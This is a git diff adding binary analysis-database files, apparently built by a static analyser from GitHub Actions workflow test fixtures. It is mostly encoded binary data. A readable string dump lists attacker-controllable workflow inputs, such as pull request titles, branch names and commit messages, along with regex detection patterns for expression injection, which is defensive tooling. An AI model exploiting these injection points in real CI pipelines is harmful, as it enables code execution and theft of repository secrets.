zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N 
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..df3045a1ff5f4f01ad1cca4e97dbff096c69683a GIT binary patch literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..cb4291b6b3b65463c7b9660f099668c0cfc4fe35 GIT binary patch literal 16384 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 Bc#Z%7 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 new file mode 100644 index 000000000000..eec9231ab076 --- /dev/null +++ b/db/db-yaml/default/strings/0/pageDump/page-000000000 
@@ -0,0 +1,2 @@ +tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language 
}}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description 
}}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary
.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*commi
tter\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... 
